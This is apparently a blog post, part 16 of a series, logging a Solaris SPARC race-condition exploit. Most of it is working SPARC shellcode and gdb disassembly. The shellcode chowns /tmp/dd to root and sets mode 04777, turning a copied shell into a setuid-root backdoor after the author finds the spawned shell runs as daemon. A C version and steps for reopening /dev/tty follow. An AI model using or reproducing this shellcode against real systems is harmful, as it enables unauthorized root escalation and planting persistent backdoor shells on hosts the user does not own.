Race Condition SHMACE ShmUh’SMISION – pt. 16
WELL WELL WELL. I’m getting the shell.. but what’s this!?! As user .. “DAEMON!??!” UID of 1 ???
I thought to myself WTF.. So I tried touching a file.. this is the code I’m using to do that:
.globl main main: ! # /bin/bash = 2f62696e 2f626173 6800 ! # /tmp/dd = 2f746d70 2f646500 set 0x2f746d70, %o0 st %o0, [%sp+84] sethi %hi(0x2f646500), %o0 st %o0, [%sp+88] !mov 0x100, %o1 mov 0x1, %o1 sll %o1, 8, %o1 !or %o1, %o0, %o0 add %sp, 84, %o0 mov 5, %g1 ! 0x5 ta 8 !ta 8 ! addition to prevent illegal instruction failure xor %o5,%o5,%o0 !add %o1,%o1,%o0 ! interprets as end of string!! even without null byte ! and o1, 2, %o0 ! exit(0) mov 1, %g1 ta 8
$ ls -l /tmp ---------- 1 root staff 0 Nov 5 21:02 dd
So I definitely have root privilege when my shellcode is executed.. So what’s the deal?? Why can’t I start a shell properly???
I have decided to copy a shell into the file /tmp/dd, which I will have my shellcode turn it into a suid root shell :)
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
main()
{
char str[] = "/tmp/dd";
// int chown(const char *path, uid_t owner, gid_t group)
chown (str, 0, 0);
// int chmod(const char *path, mode_t mode);
chmod (str, 04777);
}
x00010234 <main+0>: save %sp, -112, %sp 0x00010238 <main+4>: sethi %hi(0x17800), %g1 0x0001023c <main+8>: or %g1, 0x138, %o0 ! 0x17938 0x00010240 <main+12>: clr %o1 0x00010244 <main+16>: clr %o2 0x00010248 <main+20>: call 0x10838 <chown> 0x0001024c <main+24>: nop 0x00010250 <main+28>: sethi %hi(0x17800), %g1 0x00010254 <main+32>: or %g1, 0x138, %o0 ! 0x17938 0x00010258 <main+36>: mov 0x9ff, %o1 0x0001025c <main+40>: call 0x10814 <chmod> 0x00010260 <main+44>: nop 0x00010264 <main+48>: restore 0x00010268 <main+52>: retl 0x0001026c <main+56>: nop End of assembler dump. (gdb) disas chown Dump of assembler code for function chown: 0x00010838 <chown+0>: mov 0x10, %g1 0x0001083c <chown+4>: ta 8 0x00010840 <chown+8>: bcc 0x10854 <chown+28> 0x00010844 <chown+12>: sethi %hi(0x17000), %o5 0x00010848 <chown+16>: or %o5, 0x3c, %o5 ! 0x1703c <_cerror> 0x0001084c <chown+20>: jmp %o5 0x00010850 <chown+24>: nop 0x00010854 <chown+28>: retl 0x00010858 <chown+32>: mov %g0, %o0 End of assembler dump. (gdb) disas chmod Dump of assembler code for function chmod: 0x00010814 <chmod+0>: mov 0xf, %g1 ! 0xf 0x00010818 <chmod+4>: ta 8 0x0001081c <chmod+8>: bcc 0x10830 <chmod+28> 0x00010820 <chmod+12>: sethi %hi(0x17000), %o5 0x00010824 <chmod+16>: or %o5, 0x3c, %o5 ! 0x1703c <_cerror> 0x00010828 <chmod+20>: jmp %o5 0x0001082c <chmod+24>: nop 0x00010830 <chmod+28>: retl 0x00010834 <chmod+32>: mov %g0, %o0 End of assembler dump. (gdb)
chown/chmod /tmp/dd ASM for SC
.globl main main: ! # /tmp/dd = 2f746d70 2f646500 set 0x2f746d70, %o0 st %o0, [%sp+84] sethi %hi(0x2f646500), %o0 st %o0, [%sp+88] clr [%sp+92] !put pointer to string into $o0 add %sp,84,%o0 xor %l1, %l1, %o1 xor %l1, %l1, %o2 !call 0x10838 <chown> ! for function chown: mov 0x10, %g1 ta 8 !put pointer to string into $o0 add %sp,84,%o0 mov 0x9ff, %o1 ! call 0x10814 <chmod> ! nop mov 0xf, %g1 ! 0xf ta 8 ! addition to prevent illegal instruction failure xor %o5,%o5,%o0 !add %o1,%o1,%o0 ! interprets as end of string!! even without null byte ! and o1, 2, %o0 ! exit(0) !mov 1, %g1 add %g0, 1, %g1 ta 8
-bash-3.2$ vi opentty.c
"opentty.c" 6 lines, 64 characters
#include <fcntl.h>
main()
{
close(0);
open("/dev/tty", O_RDWR);
getchar();
}
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
"opentty.c" 8 lines, 84 characters
-bash-3.2$ gcc opentty.c
-bash-3.2$ ./a.out
l
-bash-3.2$ gcc -static opentty.c
-bash-3.2$ gdb a.out
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) disas main
Dump of assembler code for function main:
0x00010238 <main+0>: save %sp, -112, %sp
0x0001023c <main+4>: clr %o0
0x00010240 <main+8>: call 0x1234c <close>
0x00010244 <main+12>: nop
0x00010248 <main+16>: sethi %hi(0x39000), %g1
0x0001024c <main+20>: or %g1, 0x3a8, %o0 ! 0x393a8
0x00010250 <main+24>: mov 2, %o1
0x00010254 <main+28>: call 0x123b0 <open>
0x00010258 <main+32>: nop
0x0001025c <main+36>: call 0x10814 <getchar>
0x00010260 <main+40>: nop
0x00010264 <main+44>: restore
0x00010268 <main+48>: retl
0x0001026c <main+52>: nop
End of assembler dump.
(gdb) disas close
Dump of assembler code for function close:
0x0001234c <close+0>: sethi %hi(0x52400), %g1
0x00012350 <close+4>: add %g1, 0x180, %g1 ! 0x52580 <ti_jmp_table+236>
0x00012354 <close+8>: ld [ %g1 ], %g1
0x00012358 <close+12>: jmp %g1
0x0001235c <close+16>: nop
End of assembler dump.
(gdb) disas _close
Dump of assembler code for function _private_close:
0x0001776c <_private_close+0>: mov 6, %g1
0x00017770 <_private_close+4>: ta 8
0x00017774 <_private_close+8>: bcc 0x17788 <_private_close+28>
0x00017778 <_private_close+12>: sethi %hi(0x18800), %o5
0x0001777c <_private_close+16>: or %o5, 0x360, %o5 ! 0x18b60 <_cerror>
0x00017780 <_private_close+20>: jmp %o5
0x00017784 <_private_close+24>: nop
0x00017788 <_private_close+28>: retl
0x0001778c <_private_close+32>: mov %g0, %o0
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x1023c
(gdb) r
Starting program: /tmp/a.out
Breakpoint 1, 0x0001023c in main ()
(gdb) si
0x00010240 in main ()
(gdb)
0x00010244 in main ()
(gdb)
0x0001234c in close ()
(gdb)
0x00012350 in close ()
(gdb)
0x00012354 in close ()
(gdb)
0x00012358 in close ()
(gdb)
0x0001235c in close ()
(gdb)
0x0001776c in _private_close ()
(gdb) disas open
Dump of assembler code for function open:
0x000123b0 <open+0>: sethi %hi(0x52400), %g1
0x000123b4 <open+4>: add %g1, 0x194, %g1 ! 0x52594 <ti_jmp_table+256>
0x000123b8 <open+8>: ld [ %g1 ], %g1
0x000123bc <open+12>: jmp %g1
0x000123c0 <open+16>: nop
End of assembler dump.
(gdb) disas _open
Dump of assembler code for function _open:
0x000151a8 <_open+0>: save %sp, -96, %sp
0x000151ac <_open+4>: mov %i0, %o0
0x000151b0 <_open+8>: mov %i1, %o1
0x000151b4 <_open+12>: call 0x1790c <__open>
0x000151b8 <_open+16>: mov %i2, %o2
0x000151bc <_open+20>: sethi %hi(0x52800), %o1
0x000151c0 <_open+24>: ld [ %o1 + 0x1d8 ], %o1 ! 0x529d8 <__xpg4>
0x000151c4 <_open+28>: cmp %o1, 1
0x000151c8 <_open+32>: bne 0x151f8 <_open+80>
0x000151cc <_open+36>: mov %o0, %i0
0x000151d0 <_open+40>: cmp %o0, -1
0x000151d4 <_open+44>: be 0x151f8 <_open+80>
0x000151d8 <_open+48>: nop
0x000151dc <_open+52>: call 0x15258 <isptsfd>
0x000151e0 <_open+56>: nop
0x000151e4 <_open+60>: tst %o0
0x000151e8 <_open+64>: be 0x151f8 <_open+80>
0x000151ec <_open+68>: nop
0x000151f0 <_open+72>: call 0x153b4 <push_module>
0x000151f4 <_open+76>: mov %i0, %o0
0x000151f8 <_open+80>: ret
0x000151fc <_open+84>: restore
End of assembler dump.
(gdb) disas __open
Dump of assembler code for function __open:
0x0001790c <__open+0>: mov 5, %g1 ! 0x5
0x00017910 <__open+4>: ta 8
0x00017914 <__open+8>: bcc 0x17928 <__open+28>
0x00017918 <__open+12>: sethi %hi(0x18800), %o5
0x0001791c <__open+16>: or %o5, 0x360, %o5 ! 0x18b60 <_cerror>
0x00017920 <__open+20>: jmp %o5
0x00017924 <__open+24>: nop
0x00017928 <__open+28>: retl
0x0001792c <__open+32>: nop
End of assembler dump.
(gdb) b *0x00010254
Breakpoint 2 at 0x10254
(gdb) c
Continuing.
Breakpoint 2, 0x00010254 in main ()
(gdb) x/s $o0
0x393a8: "/dev/tty"
(gdb)
main()
{
setuid(7343);
system("/bin/bash");
}
Leave a Reply